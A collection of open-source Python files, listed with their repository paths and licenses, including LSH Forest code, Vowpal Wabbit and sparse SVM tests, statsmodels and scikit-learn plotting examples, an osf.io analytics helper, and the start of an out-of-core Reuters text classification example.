(default is the value passed to the constructor).
return_distance : boolean, optional (default = False)
Returns the distances of neighbors if set to True.
Returns
-------
dist : array, shape (n_samples,) of arrays
Each element is an array representing the cosine distances
to some points found within ``radius`` of the respective query.
Only present if ``return_distance=True``.
ind : array, shape (n_samples,) of arrays
Each element is an array of indices for neighbors within ``radius``
of the respective query.
"""
if not hasattr(self, 'hash_functions_'):
raise ValueError("estimator should be fitted.")
if radius is None:
radius = self.radius
X = check_array(X, accept_sparse='csr')
neighbors, distances = [], []
bin_queries, max_depth = self._query(X)
for i in range(X.shape[0]):
neighs, dists = self._get_radius_neighbors(X[[i]], max_depth[i],
bin_queries[i], radius)
neighbors.append(neighs)
distances.append(dists)
if return_distance:
return _array_of_arrays(distances), _array_of_arrays(neighbors)
else:
return _array_of_arrays(neighbors)
def partial_fit(self, X, y=None):
"""
Inserts new data into the already fitted LSH Forest.
Cost is proportional to new total size, so additions
should be batched.
Parameters
----------
X : array_like or sparse (CSR) matrix, shape (n_samples, n_features)
New data point to be inserted into the LSH Forest.
"""
X = check_array(X, accept_sparse='csr')
if not hasattr(self, 'hash_functions_'):
return self.fit(X)
if X.shape[1] != self._fit_X.shape[1]:
raise ValueError("Number of features in X and"
" fitted array does not match.")
n_samples = X.shape[0]
n_indexed = self._fit_X.shape[0]
for i in range(self.n_estimators):
bin_X = self.hash_functions_[i].transform(X)[:, 0]
# gets the position to be added in the tree.
positions = self.trees_[i].searchsorted(bin_X)
# adds the hashed value into the tree.
self.trees_[i] = np.insert(self.trees_[i],
positions, bin_X)
# add the entry into the original_indices_.
self.original_indices_[i] = np.insert(self.original_indices_[i],
positions,
np.arange(n_indexed,
n_indexed +
n_samples))
# adds the entry into the input_array.
if sparse.issparse(X) or sparse.issparse(self._fit_X):
self._fit_X = sparse.vstack((self._fit_X, X))
else:
self._fit_X = np.row_stack((self._fit_X, X))
return self
| bsd-3-clause |
marko-asplund/vowpal_wabbit | python/test_sklearn_vw.py | 1 | 5022 | from collections import namedtuple
import numpy as np
import pytest
from sklearn.utils.estimator_checks import check_estimator
from sklearn_vw import VW, VWClassifier, VWRegressor, tovw
from sklearn import datasets
from sklearn.utils.validation import NotFittedError
from scipy.sparse import csr_matrix
"""
Test utilities to support integration of Vowpal Wabbit and scikit-learn
"""
Dataset = namedtuple('Dataset', 'x, y')
@pytest.fixture(scope='module')
def data():
x, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
x = x.astype(np.float32)
return Dataset(x=x, y=y)
class TestVW:
def test_validate_vw_estimator(self):
"""
Run VW and VWClassifier through the sklearn estimator validation check
Note: the VW estimators fail sklearn's estimator validation check. The validator creates a new
instance of the estimator with the estimator's default args, '--quiet' in VW's case. At some point
in the validation sequence it calls fit() with some fake data. The data gets formatted via tovw() to:
2 1 | 0:0.5488135039273248 1:0.7151893663724195 2:0.6027633760716439 3:0.5448831829968969 4:0.4236547993389047 5:0.6458941130666561 6:0.4375872112626925 7:0.8917730007820798 8:0.9636627605010293 9:0.3834415188257777
This gets passed into vw.learn and the python process dies with the error, "Process finished with exit code 139"
At some point it would probably be worth while figuring out the problem this and getting the two estimators to
pass sklearn's validation check
"""
# check_estimator(VW)
# check_estimator(VWClassifier)
def test_init(self):
assert isinstance(VW(), VW)
def test_fit(self, data):
model = VW(loss_function='logistic')
assert not hasattr(model, 'fit_')
model.fit(data.x, data.y)
assert model.fit_
def test_passes(self, data):
n_passes = 2
model = VW(loss_function='logistic', passes=n_passes)
assert model.passes_ == n_passes
model.fit(data.x, data.y)
weights = model.get_coefs()
model = VW(loss_function='logistic')
# first pass weights should not be the same
model.fit(data.x, data.y)
assert not np.allclose(weights.data, model.get_coefs().data)
# second pass weights should match
model.fit(data.x, data.y)
assert np.allclose(weights.data, model.get_coefs().data)
def test_predict_not_fit(self, data):
model = VW(loss_function='logistic')
with pytest.raises(NotFittedError):
model.predict(data.x[0])
def test_predict(self, data):
model = VW(loss_function='logistic')
model.fit(data.x, data.y)
assert np.isclose(model.predict(data.x[:1][:1])[0], 0.406929)
def test_predict_no_convert(self):
model = VW(loss_function='logistic', convert_to_vw=False)
model.fit(['-1 | bad', '1 | good'])
assert np.isclose(model.predict(['| good'])[0], 0.245515)
def test_set_params(self):
model = VW()
assert 'l' not in model.params
model.set_params(l=0.1)
assert model.params['l'] == 0.1
# confirm model params reset with new construction
model = VW()
assert 'l' not in model.params
def test_get_coefs(self, data):
model = VW()
model.fit(data.x, data.y)
weights = model.get_coefs()
print weights.data
assert np.allclose(weights.indices, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 116060])
def test_get_intercept(self, data):
model = VW()
model.fit(data.x, data.y)
intercept = model.get_intercept()
assert isinstance(intercept, float)
class TestVWClassifier:
def test_init(self):
assert isinstance(VWClassifier(), VWClassifier)
def test_decision_function(self, data):
classes = np.array([-1., 1.])
raw_model = VW(loss_function='logistic')
raw_model.fit(data.x, data.y)
predictions = raw_model.predict(data.x)
class_indices = (predictions > 0).astype(np.int)
class_predictions = classes[class_indices]
model = VWClassifier()
model.fit(data.x, data.y)
assert np.allclose(class_predictions, model.predict(data.x))
class TestVWRegressor:
def test_init(self):
assert isinstance(VWRegressor(), VWRegressor)
def test_predict(self, data):
raw_model = VW()
raw_model.fit(data.x, data.y)
model = VWRegressor()
model.fit(data.x, data.y)
assert np.allclose(raw_model.predict(data.x), model.predict(data.x))
def test_tovw():
x = np.array([[1.2, 3.4, 5.6, 1.0, 10], [7.8, 9.10, 11, 0, 20]])
y = np.array([1, -1])
w = [1, 2]
expected = ['1 1 | 0:1.2 1:3.4 2:5.6 3:1 4:10',
'-1 2 | 0:7.8 1:9.1 2:11 4:20']
assert tovw(x=x, y=y, sample_weight=w) == expected
assert tovw(x=csr_matrix(x), y=y, sample_weight=w) == expected
| bsd-3-clause |
jstoxrocky/statsmodels | statsmodels/sandbox/nonparametric/tests/ex_gam_new.py | 34 | 3845 | # -*- coding: utf-8 -*-
"""Example for GAM with Poisson Model and PolynomialSmoother
This example was written as a test case.
The data generating process is chosen so the parameters are well identified
and estimated.
Created on Fri Nov 04 13:45:43 2011
Author: Josef Perktold
"""
from __future__ import print_function
from statsmodels.compat.python import lrange, zip
import time
import numpy as np
#import matplotlib.pyplot as plt
np.seterr(all='raise')
from scipy import stats
from statsmodels.sandbox.gam import AdditiveModel
from statsmodels.sandbox.gam import Model as GAM #?
from statsmodels.genmod.families import family
from statsmodels.genmod.generalized_linear_model import GLM
np.random.seed(8765993)
#seed is chosen for nice result, not randomly
#other seeds are pretty off in the prediction or end in overflow
#DGP: simple polynomial
order = 3
sigma_noise = 0.1
nobs = 1000
#lb, ub = -0.75, 3#1.5#0.75 #2.5
lb, ub = -3.5, 3
x1 = np.linspace(lb, ub, nobs)
x2 = np.sin(2*x1)
x = np.column_stack((x1/x1.max()*1, 1.*x2))
exog = (x[:,:,None]**np.arange(order+1)[None, None, :]).reshape(nobs, -1)
idx = lrange((order+1)*2)
del idx[order+1]
exog_reduced = exog[:,idx] #remove duplicate constant
y_true = exog.sum(1) #/ 4.
z = y_true #alias check
d = x
y = y_true + sigma_noise * np.random.randn(nobs)
example = 3
if example == 2:
print("binomial")
f = family.Binomial()
mu_true = f.link.inverse(z)
#b = np.asarray([scipy.stats.bernoulli.rvs(p) for p in f.link.inverse(y)])
b = np.asarray([stats.bernoulli.rvs(p) for p in f.link.inverse(z)])
b.shape = y.shape
m = GAM(b, d, family=f)
toc = time.time()
m.fit(b)
tic = time.time()
print(tic-toc)
#for plotting
yp = f.link.inverse(y)
p = b
if example == 3:
print("Poisson")
f = family.Poisson()
#y = y/y.max() * 3
yp = f.link.inverse(z)
#p = np.asarray([scipy.stats.poisson.rvs(p) for p in f.link.inverse(y)], float)
p = np.asarray([stats.poisson.rvs(p) for p in f.link.inverse(z)], float)
p.shape = y.shape
m = GAM(p, d, family=f)
toc = time.time()
m.fit(p)
tic = time.time()
print(tic-toc)
for ss in m.smoothers:
print(ss.params)
if example > 1:
import matplotlib.pyplot as plt
plt.figure()
for i in np.array(m.history[2:15:3]): plt.plot(i.T)
plt.figure()
plt.plot(exog)
#plt.plot(p, '.', lw=2)
plt.plot(y_true, lw=2)
y_pred = m.results.mu # + m.results.alpha #m.results.predict(d)
plt.figure()
plt.subplot(2,2,1)
plt.plot(p, '.')
plt.plot(yp, 'b-', label='true')
plt.plot(y_pred, 'r-', label='GAM')
plt.legend(loc='upper left')
plt.title('gam.GAM Poisson')
counter = 2
for ii, xx in zip(['z', 'x1', 'x2'], [z, x[:,0], x[:,1]]):
sortidx = np.argsort(xx)
#plt.figure()
plt.subplot(2, 2, counter)
plt.plot(xx[sortidx], p[sortidx], 'k.', alpha=0.5)
plt.plot(xx[sortidx], yp[sortidx], 'b.', label='true')
plt.plot(xx[sortidx], y_pred[sortidx], 'r.', label='GAM')
plt.legend(loc='upper left')
plt.title('gam.GAM Poisson ' + ii)
counter += 1
res = GLM(p, exog_reduced, family=f).fit()
#plot component, compared to true component
x1 = x[:,0]
x2 = x[:,1]
f1 = exog[:,:order+1].sum(1) - 1 #take out constant
f2 = exog[:,order+1:].sum(1) - 1
plt.figure()
#Note: need to correct for constant which is indeterminatedly distributed
#plt.plot(x1, m.smoothers[0](x1)-m.smoothers[0].params[0]+1, 'r')
#better would be subtract f(0) m.smoothers[0](np.array([0]))
plt.plot(x1, f1, linewidth=2)
plt.plot(x1, m.smoothers[0](x1)-m.smoothers[0].params[0], 'r')
plt.figure()
plt.plot(x2, f2, linewidth=2)
plt.plot(x2, m.smoothers[1](x2)-m.smoothers[1].params[0], 'r')
plt.show() | bsd-3-clause |
bhargav/scikit-learn | examples/linear_model/plot_ard.py | 29 | 2828 | """
==================================================
Automatic Relevance Determination Regression (ARD)
==================================================
Fit regression model with Bayesian Ridge Regression.
See :ref:`bayesian_ridge_regression` for more information on the regressor.
Compared to the OLS (ordinary least squares) estimator, the coefficient
weights are slightly shifted toward zeros, which stabilises them.
The histogram of the estimated weights is very peaked, as a sparsity-inducing
prior is implied on the weights.
The estimation of the model is done by iteratively maximizing the
marginal log-likelihood of the observations.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.linear_model import ARDRegression, LinearRegression
###############################################################################
# Generating simulated data with Gaussian weights
# Parameters of the example
np.random.seed(0)
n_samples, n_features = 100, 100
# Create Gaussian data
X = np.random.randn(n_samples, n_features)
# Create weights with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noite with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
###############################################################################
# Fit the ARD Regression
clf = ARDRegression(compute_score=True)
clf.fit(X, y)
ols = LinearRegression()
ols.fit(X, y)
###############################################################################
# Plot the true weights, the estimated weights and the histogram of the
# weights
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
plt.plot(clf.coef_, color='darkblue', linestyle='-', linewidth=2,
label="ARD estimate")
plt.plot(ols.coef_, color='yellowgreen', linestyle=':', linewidth=2,
label="OLS estimate")
plt.plot(w, color='orange', linestyle='-', linewidth=2, label="Ground truth")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc=1)
plt.figure(figsize=(6, 5))
plt.title("Histogram of the weights")
plt.hist(clf.coef_, bins=n_features, color='navy', log=True)
plt.scatter(clf.coef_[relevant_features], 5 * np.ones(len(relevant_features)),
color='gold', marker='o', label="Relevant features")
plt.ylabel("Features")
plt.xlabel("Values of the weights")
plt.legend(loc=1)
plt.figure(figsize=(6, 5))
plt.title("Marginal log-likelihood")
plt.plot(clf.scores_, color='navy', linewidth=2)
plt.ylabel("Score")
plt.xlabel("Iterations")
plt.show()
| bsd-3-clause |
wanggang3333/scikit-learn | examples/mixture/plot_gmm_sin.py | 248 | 2747 | """
=================================
Gaussian Mixture Model Sine Curve
=================================
This example highlights the advantages of the Dirichlet Process:
complexity control and dealing with sparse data. The dataset is formed
by 100 points loosely spaced following a noisy sine curve. The fit by
the GMM class, using the expectation-maximization algorithm to fit a
mixture of 10 Gaussian components, finds too-small components and very
little structure. The fits by the Dirichlet process, however, show
that the model can either learn a global structure for the data (small
alpha) or easily interpolate to finding relevant local structure
(large alpha), never falling into the problems shown by the GMM class.
"""
import itertools
import numpy as np
from scipy import linalg
import matplotlib.pyplot as plt
import matplotlib as mpl
from sklearn import mixture
from sklearn.externals.six.moves import xrange
# Number of samples per component
n_samples = 100
# Generate random sample following a sine curve
np.random.seed(0)
X = np.zeros((n_samples, 2))
step = 4 * np.pi / n_samples
for i in xrange(X.shape[0]):
x = i * step - 6
X[i, 0] = x + np.random.normal(0, 0.1)
X[i, 1] = 3 * (np.sin(x) + np.random.normal(0, .2))
color_iter = itertools.cycle(['r', 'g', 'b', 'c', 'm'])
for i, (clf, title) in enumerate([
(mixture.GMM(n_components=10, covariance_type='full', n_iter=100),
"Expectation-maximization"),
(mixture.DPGMM(n_components=10, covariance_type='full', alpha=0.01,
n_iter=100),
"Dirichlet Process,alpha=0.01"),
(mixture.DPGMM(n_components=10, covariance_type='diag', alpha=100.,
n_iter=100),
"Dirichlet Process,alpha=100.")]):
clf.fit(X)
splot = plt.subplot(3, 1, 1 + i)
Y_ = clf.predict(X)
for i, (mean, covar, color) in enumerate(zip(
clf.means_, clf._get_covars(), color_iter)):
v, w = linalg.eigh(covar)
u = w[0] / linalg.norm(w[0])
# as the DP will not use every component it has access to
# unless it needs it, we shouldn't plot the redundant
# components.
if not np.any(Y_ == i):
continue
plt.scatter(X[Y_ == i, 0], X[Y_ == i, 1], .8, color=color)
# Plot an ellipse to show the Gaussian component
angle = np.arctan(u[1] / u[0])
angle = 180 * angle / np.pi # convert to degrees
ell = mpl.patches.Ellipse(mean, v[0], v[1], 180 + angle, color=color)
ell.set_clip_box(splot.bbox)
ell.set_alpha(0.5)
splot.add_artist(ell)
plt.xlim(-6, 4 * np.pi - 6)
plt.ylim(-5, 5)
plt.title(title)
plt.xticks(())
plt.yticks(())
plt.show()
| bsd-3-clause |
icdishb/scikit-learn | sklearn/svm/tests/test_sparse.py | 15 | 12169 | from nose.tools import assert_raises, assert_true, assert_false
import numpy as np
from scipy import sparse
from numpy.testing import (assert_array_almost_equal, assert_array_equal,
assert_equal)
from sklearn import datasets, svm, linear_model, base
from sklearn.datasets import make_classification, load_digits, make_blobs
from sklearn.svm.tests import test_svm
from sklearn.utils import ConvergenceWarning
from sklearn.utils.extmath import safe_sparse_dot
from sklearn.utils.testing import assert_warns, assert_raise_message
# test sample 1
X = np.array([[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]])
X_sp = sparse.lil_matrix(X)
Y = [1, 1, 1, 2, 2, 2]
T = np.array([[-1, -1], [2, 2], [3, 2]])
true_result = [1, 2, 2]
# test sample 2
X2 = np.array([[0, 0, 0], [1, 1, 1], [2, 0, 0, ],
[0, 0, 2], [3, 3, 3]])
X2_sp = sparse.dok_matrix(X2)
Y2 = [1, 2, 2, 2, 3]
T2 = np.array([[-1, -1, -1], [1, 1, 1], [2, 2, 2]])
true_result2 = [1, 2, 3]
iris = datasets.load_iris()
# permute
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
# sparsify
iris.data = sparse.csr_matrix(iris.data)
def check_svm_model_equal(dense_svm, sparse_svm, X_train, y_train, X_test):
dense_svm.fit(X_train.toarray(), y_train)
if sparse.isspmatrix(X_test):
X_test_dense = X_test.toarray()
else:
X_test_dense = X_test
sparse_svm.fit(X_train, y_train)
assert_true(sparse.issparse(sparse_svm.support_vectors_))
assert_true(sparse.issparse(sparse_svm.dual_coef_))
assert_array_almost_equal(dense_svm.support_vectors_,
sparse_svm.support_vectors_.toarray())
assert_array_almost_equal(dense_svm.dual_coef_, sparse_svm.dual_coef_.toarray())
if dense_svm.kernel == "linear":
assert_true(sparse.issparse(sparse_svm.coef_))
assert_array_almost_equal(dense_svm.coef_, sparse_svm.coef_.toarray())
assert_array_almost_equal(dense_svm.support_, sparse_svm.support_)
assert_array_almost_equal(dense_svm.predict(X_test_dense), sparse_svm.predict(X_test))
assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
sparse_svm.decision_function(X_test))
assert_array_almost_equal(dense_svm.decision_function(X_test_dense),
sparse_svm.decision_function(X_test_dense))
assert_array_almost_equal(dense_svm.predict_proba(X_test_dense),
sparse_svm.predict_proba(X_test), 4)
msg = "cannot use sparse input in 'SVC' trained on dense data"
if sparse.isspmatrix(X_test):
assert_raise_message(ValueError, msg, dense_svm.predict, X_test)
def test_svc():
"""Check that sparse SVC gives the same result as SVC"""
# many class dataset:
X_blobs, y_blobs = make_blobs(n_samples=100, centers=10, random_state=0)
X_blobs = sparse.csr_matrix(X_blobs)
datasets = [[X_sp, Y, T], [X2_sp, Y2, T2],
[X_blobs[:80], y_blobs[:80], X_blobs[80:]],
[iris.data, iris.target, iris.data]]
kernels = ["linear", "poly", "rbf", "sigmoid"]
for dataset in datasets:
for kernel in kernels:
clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
sp_clf = svm.SVC(kernel=kernel, probability=True, random_state=0)
check_svm_model_equal(clf, sp_clf, *dataset)
def test_unsorted_indices():
# test that the result with sorted and unsorted indices in csr is the same
# we use a subset of digits as iris, blobs or make_classification didn't
# show the problem
digits = load_digits()
X, y = digits.data[:50], digits.target[:50]
X_test = sparse.csr_matrix(digits.data[50:100])
X_sparse = sparse.csr_matrix(X)
coef_dense = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X, y).coef_
sparse_svc = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X_sparse, y)
coef_sorted = sparse_svc.coef_
# make sure dense and sparse SVM give the same result
assert_array_almost_equal(coef_dense, coef_sorted.toarray())
X_sparse_unsorted = X_sparse[np.arange(X.shape[0])]
X_test_unsorted = X_test[np.arange(X_test.shape[0])]
# make sure we scramble the indices
assert_false(X_sparse_unsorted.has_sorted_indices)
assert_false(X_test_unsorted.has_sorted_indices)
unsorted_svc = svm.SVC(kernel='linear', probability=True,
random_state=0).fit(X_sparse_unsorted, y)
coef_unsorted = unsorted_svc.coef_
# make sure unsorted indices give same result
assert_array_almost_equal(coef_unsorted.toarray(), coef_sorted.toarray())
assert_array_almost_equal(sparse_svc.predict_proba(X_test_unsorted),
sparse_svc.predict_proba(X_test))
def test_svc_with_custom_kernel():
kfunc = lambda x, y: safe_sparse_dot(x, y.T)
clf_lin = svm.SVC(kernel='linear').fit(X_sp, Y)
clf_mylin = svm.SVC(kernel=kfunc).fit(X_sp, Y)
assert_array_equal(clf_lin.predict(X_sp), clf_mylin.predict(X_sp))
def test_svc_iris():
# Test the sparse SVC with the iris dataset
for k in ('linear', 'poly', 'rbf'):
sp_clf = svm.SVC(kernel=k).fit(iris.data, iris.target)
clf = svm.SVC(kernel=k).fit(iris.data.toarray(), iris.target)
assert_array_almost_equal(clf.support_vectors_,
sp_clf.support_vectors_.toarray())
assert_array_almost_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
assert_array_almost_equal(
clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
if k == 'linear':
assert_array_almost_equal(clf.coef_, sp_clf.coef_.toarray())
def test_sparse_decision_function():
"""
Test decision_function
Sanity check, test that decision_function implemented in python
returns the same as the one in libsvm
"""
# multi class:
clf = svm.SVC(kernel='linear', C=0.1).fit(iris.data, iris.target)
dec = safe_sparse_dot(iris.data, clf.coef_.T) + clf.intercept_
assert_array_almost_equal(dec, clf.decision_function(iris.data))
# binary:
clf.fit(X, Y)
dec = np.dot(X, clf.coef_.T) + clf.intercept_
prediction = clf.predict(X)
assert_array_almost_equal(dec.ravel(), clf.decision_function(X))
assert_array_almost_equal(
prediction,
clf.classes_[(clf.decision_function(X) > 0).astype(np.int).ravel()])
expected = np.array([-1., -0.66, -1., 0.66, 1., 1.])
assert_array_almost_equal(clf.decision_function(X), expected, 2)
def test_error():
# Test that it gives proper exception on deficient input
# impossible value of C
assert_raises(ValueError, svm.SVC(C=-1).fit, X, Y)
# impossible value of nu
clf = svm.NuSVC(nu=0.0)
assert_raises(ValueError, clf.fit, X_sp, Y)
Y2 = Y[:-1] # wrong dimensions for labels
assert_raises(ValueError, clf.fit, X_sp, Y2)
clf = svm.SVC()
clf.fit(X_sp, Y)
assert_array_equal(clf.predict(T), true_result)
def test_linearsvc():
# Similar to test_SVC
clf = svm.LinearSVC(random_state=0).fit(X, Y)
sp_clf = svm.LinearSVC(random_state=0).fit(X_sp, Y)
assert_true(sp_clf.fit_intercept)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
assert_array_almost_equal(clf.predict(X), sp_clf.predict(X_sp))
clf.fit(X2, Y2)
sp_clf.fit(X2_sp, Y2)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=4)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=4)
def test_linearsvc_iris():
# Test the sparse LinearSVC with the iris dataset
sp_clf = svm.LinearSVC(random_state=0).fit(iris.data, iris.target)
clf = svm.LinearSVC(random_state=0).fit(iris.data.toarray(), iris.target)
assert_equal(clf.fit_intercept, sp_clf.fit_intercept)
assert_array_almost_equal(clf.coef_, sp_clf.coef_, decimal=1)
assert_array_almost_equal(clf.intercept_, sp_clf.intercept_, decimal=1)
assert_array_almost_equal(
clf.predict(iris.data.toarray()), sp_clf.predict(iris.data))
# check decision_function
pred = np.argmax(sp_clf.decision_function(iris.data), 1)
assert_array_almost_equal(pred, clf.predict(iris.data.toarray()))
# sparsify the coefficients on both models and check that they still
# produce the same results
clf.sparsify()
assert_array_equal(pred, clf.predict(iris.data))
sp_clf.sparsify()
assert_array_equal(pred, sp_clf.predict(iris.data))
def test_weight():
# Test class weights
X_, y_ = make_classification(n_samples=200, n_features=100,
weights=[0.833, 0.167], random_state=0)
X_ = sparse.csr_matrix(X_)
for clf in (linear_model.LogisticRegression(),
svm.LinearSVC(random_state=0),
svm.SVC()):
clf.set_params(class_weight={0: 5})
clf.fit(X_[:180], y_[:180])
y_pred = clf.predict(X_[180:])
assert_true(np.sum(y_pred == y_[180:]) >= 11)
def test_sample_weights():
# Test weights on individual samples
clf = svm.SVC()
clf.fit(X_sp, Y)
assert_array_equal(clf.predict(X[2]), [1.])
sample_weight = [.1] * 3 + [10] * 3
clf.fit(X_sp, Y, sample_weight=sample_weight)
assert_array_equal(clf.predict(X[2]), [2.])
def test_sparse_liblinear_intercept_handling():
# Test that sparse liblinear honours intercept_scaling param
test_svm.test_dense_liblinear_intercept_handling(svm.LinearSVC)
def test_sparse_realdata():
# Test on a subset from the 20newsgroups dataset.
# This catchs some bugs if input is not correctly converted into
# sparse format or weights are not correctly initialized.
data = np.array([0.03771744, 0.1003567, 0.01174647, 0.027069])
indices = np.array([6, 5, 35, 31])
indptr = np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4])
X = sparse.csr_matrix((data, indices, indptr))
y = np.array(
[1., 0., 2., 2., 1., 1., 1., 2., 2., 0., 1., 2., 2.,
0., 2., 0., 3., 0., 3., 0., 1., 1., 3., 2., 3., 2.,
0., 3., 1., 0., 2., 1., 2., 0., 1., 0., 2., 3., 1.,
3., 0., 1., 0., 0., 2., 0., 1., 2., 2., 2., 3., 2.,
0., 3., 2., 1., 2., 3., 2., 2., 0., 1., 0., 1., 2.,
3., 0., 0., 2., 2., 1., 3., 1., 1., 0., 1., 2., 1.,
1., 3.])
clf = svm.SVC(kernel='linear').fit(X.toarray(), y)
sp_clf = svm.SVC(kernel='linear').fit(sparse.coo_matrix(X), y)
assert_array_equal(clf.support_vectors_, sp_clf.support_vectors_.toarray())
assert_array_equal(clf.dual_coef_, sp_clf.dual_coef_.toarray())
def test_sparse_svc_clone_with_callable_kernel():
# Test that the "dense_fit" is called even though we use sparse input
# meaning that everything works fine.
a = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
random_state=0)
b = base.clone(a)
b.fit(X_sp, Y)
pred = b.predict(X_sp)
b.predict_proba(X_sp)
dense_svm = svm.SVC(C=1, kernel=lambda x, y: np.dot(x, y.T),
probability=True, random_state=0)
pred_dense = dense_svm.fit(X, Y).predict(X)
assert_array_equal(pred_dense, pred)
# b.decision_function(X_sp) # XXX : should be supported
def test_timeout():
sp = svm.SVC(C=1, kernel=lambda x, y: x * y.T, probability=True,
random_state=0, max_iter=1)
assert_warns(ConvergenceWarning, sp.fit, X_sp, Y)
def test_consistent_proba():
a = svm.SVC(probability=True, max_iter=1, random_state=0)
proba_1 = a.fit(X, Y).predict_proba(X)
a = svm.SVC(probability=True, max_iter=1, random_state=0)
proba_2 = a.fit(X, Y).predict_proba(X)
assert_array_almost_equal(proba_1, proba_2)
| bsd-3-clause |
revanthkolli/osf.io | scripts/analytics/utils.py | 6 | 1349 | # -*- coding: utf-8 -*-
import os
import unicodecsv as csv
from bson import ObjectId
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import seaborn as sns # noqa
import requests
from website.addons.osfstorage import utils as storage_utils
def oid_to_datetime(oid):
return ObjectId(oid).generation_time
def mkdirp(path):
try:
os.makedirs(path)
except OSError:
pass
def plot_dates(dates, *args, **kwargs):
"""Plot date histogram."""
fig = plt.figure()
ax = fig.add_subplot(111)
ax.hist(
[mdates.date2num(each) for each in dates],
*args, **kwargs
)
fig.autofmt_xdate()
ax.format_xdata = mdates.DateFormatter('%Y-%m-%d')
ax.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
return fig
def make_csv(fp, rows, headers=None):
writer = csv.writer(fp)
if headers:
writer.writerow(headers)
writer.writerows(rows)
def send_file(app, name, content_type, file_like, node, user):
"""Upload file to OSF."""
file_like.seek(0)
with app.test_request_context():
upload_url = storage_utils.get_waterbutler_upload_url(
user,
node,
path=name,
)
requests.put(
upload_url,
data=file_like,
headers={'Content-Type': content_type},
)
| apache-2.0 |
frank-tancf/scikit-learn | examples/applications/plot_out_of_core_classification.py | 32 | 13829 | """
======================================================
Out-of-core classification of text documents
======================================================
This is an example showing how scikit-learn can be used for classification
using an out-of-core approach: learning from data that doesn't fit into main
memory. We make use of an online classifier, i.e., one that supports the
partial_fit method, that will be fed with batches of examples. To guarantee
that the features space remains the same over time we leverage a
HashingVectorizer that will project each example into the same feature space.
This is especially useful in the case of text classification where new
features (words) may appear in each batch.
The dataset used in this example is Reuters-21578 as provided by the UCI ML
repository. It will be automatically downloaded and uncompressed on first run.
The plot represents the learning curve of the classifier: the evolution
of classification accuracy over the course of the mini-batches. Accuracy is
measured on the first 1000 samples, held out as a validation set.
To limit the memory consumption, we queue examples up to a fixed amount before
feeding them to the learner.
"""
# Authors: Eustache Diemert <eustache@diemert.fr>
# @FedericoV <https://github.com/FedericoV/>
# License: BSD 3 clause
from __future__ import print_function
from glob import glob
import itertools
import os.path
import re
import tarfile
import time
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import rcParams
from sklearn.externals.six.moves import html_parser
from sklearn.externals.six.moves import urllib
from sklearn.datasets import get_data_home
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.linear_model import Perceptron
from sklearn.naive_bayes import MultinomialNB
def _not_in_sphinx():
# Hack to detect whether we are running by the sphinx builder
return '__file__' in globals()
###############################################################################
# Reuters Dataset related routines
###############################################################################
class ReutersParser(html_parser.HTMLParser):
"""Utility class to parse a SGML file and yield documents one at a time."""
def __init__(self, encoding='latin-1'):
html_parser.HTMLParser.__init__(self)
self._reset()
self.encoding = encoding
def handle_starttag(self, tag, attrs):
method = 'start_' + tag
getattr(self, method, lambda x: None)(attrs)
def handle_endtag(self, tag):
method = 'end_' + tag
getattr(self, method, lambda: None)()
def _reset(self):
self.in_title = 0
self.in_body = 0
self.in_topics = 0
self.in_topic_d = 0
self.title = ""
self.body = ""
self.topics = []
self.topic_d = ""
def parse(self, fd):
self.docs = []
for chunk in fd:
self.feed(chunk.decode(self.encoding))
for doc in self.docs:
yield doc
self.docs = []
self.close()
def handle_data(self, data):
if self.in_body:
self.body += data
elif self.in_title:
self.title += data
elif self.in_topic_d:
self.topic_d += data
def start_reuters(self, attributes):
pass
def end_reuters(self):
self.body = re.sub(r'\s+', r' ', self.body)
self.docs.append({'title': self.title,
'body': self.body,
'topics': self.topics})
self._reset()
def start_title(self, attributes):
self.in_title = 1
def end_title(self):
self.in_title = 0
def start_body(self, attributes):
self.in_body = 1
def end_body(self):
self.in_body = 0
def start_topics(self, attributes):
self.in_topics = 1
def end_topics(self):
self.in_topics = 0
def start_d(self, attributes):
self.in_topic_d = 1
def end_d(self):
self.in_topic_d = 0
self.topics.append(self.topic_d)
self.topic_d = ""
def stream_reuters_documents(data_path=None):
"""Iterate over documents of the Reuters dataset.
The Reuters archive will automatically be downloaded and uncompressed if
the `data_path` directory does not exist.
Documents are represented as dictionaries with 'body' (str),
'title' (str), 'topics' (list(str)) keys.
"""
